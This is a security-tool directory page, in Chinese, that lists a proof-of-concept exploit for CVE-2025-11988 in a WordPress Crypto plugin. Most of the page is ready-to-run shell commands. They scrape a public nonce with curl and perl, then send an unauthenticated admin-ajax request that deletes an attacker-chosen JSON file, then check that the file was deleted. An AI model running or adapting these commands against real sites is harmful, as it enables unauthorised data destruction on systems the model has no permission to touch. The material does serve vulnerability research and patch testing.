Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-11988 — 概念验证漏洞利用针对CVE-2025-11988,展示了通过精心构造的AJAX请求在WordPress Crypto插件中实现未经验证的任意JSON文件删除。 | Kitploit
工具/GitHubGitHub/jfriedli/cve-2025-11988
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubjfriedli/cve-2025-11988

CVE-2025-11988

概念验证漏洞利用针对CVE-2025-11988,展示了通过精心构造的AJAX请求在WordPress Crypto插件中实现未经验证的任意JSON文件删除。

查看仓库
5个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

1) 提取公开的 crypto_ajax nonce

root@kitploit:~
UA='Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0'
PAGE_URL='http://localhost/wordpress/<ANY_PAGE>/'

NONCE=$(curl -s "$PAGE_URL" -A "$UA" | \
  perl -0777 -ne 'print "$1\n" if /crypto_connectChainAjax\s*=\s*\{[^}]*"nonce"\s*:\s*"([^"]+)"/s')

# Fallback extraction
[ -z "$NONCE" ] && NONCE=$(curl -s "$PAGE_URL" -A "$UA" | \
  perl -ne "print \"$1\n\" if /create_link_crypto_connect_login\\(\\s*'([A-Za-z0-9_-]+)'/i")

echo "Nonce: $NONCE"

2) 删除任意 JSON 文件(未认证)

root@kitploit:~
curl -s "http://localhost/wordpress/wp-admin/admin-ajax.php" -A "$UA" \
  --data "action=crypto_connect_ajax_process&method_name=crypto_delete_json&id=1&nonce=${NONCE}&param1=order123"

param1 对应文件名前缀(例如 order123 → order123_pending.json)


3) 验证删除

root@kitploit:~
if [ -e "$BASEDIR/yak/order123_pending.json" ]; then
  echo "[-] File still exists"
else
  echo "[+] Deleted successfully"
fi
下载工具